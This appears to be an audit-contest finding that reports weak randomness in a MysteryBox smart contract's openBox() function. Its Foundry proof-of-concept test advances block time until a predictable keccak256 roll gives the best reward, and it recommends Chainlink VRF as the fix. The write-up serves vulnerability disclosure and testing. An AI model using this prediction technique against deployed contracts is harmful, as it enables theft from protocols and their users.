Submission Details
Severity:
Weak RNG in `MysteryBox::openBox()`
Summary
There is weak random number generation in MysteryBox::openBox() which allows a malicious actor to essentially choose what reward they want
Vulnerability Details
MysteryBox::openBox() is using factors that can be edited by a validator (especially block.timestamp) which allows for malicious actors to bypass the RNG in order to get the reward they want
Impact
Allows attacker to steal from the protocol by getting the most valuable rewards
Proof of Concept
Add this code to bottom of TestMysteryBox.t.sol
function testWeakRNGInOpenBox() public {
string memory rewardName;
uint256 rewardValue;
address attacker = makeAddr("attacker");
hoax(attacker, 0.1 ether);
mysteryBox.buyBox{value: 0.1 ether}();
bool rewardOpened = false;
while (!rewardOpened) {
if (uint256(keccak256(abi.encodePacked(block.timestamp, attacker))) % 100 == 99) {
vm.prank(attacker);
mysteryBox.openBox();
rewardOpened = true;
} else {
vm.warp(block.timestamp + 1);
vm.roll(block.number + 1);
}
}
(rewardName, rewardValue) = mysteryBox.rewardsOwned(attacker, 0);
console.log("Attacker's Reward: ", rewardName);
console.log("Attacker's Reward Value: ", rewardValue);
}
Tools Used
Manual Review
Recommendations
Use a trusted source for random number generation such as ChainLink's VRF
Rewards breakdown
nSLOC
86This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.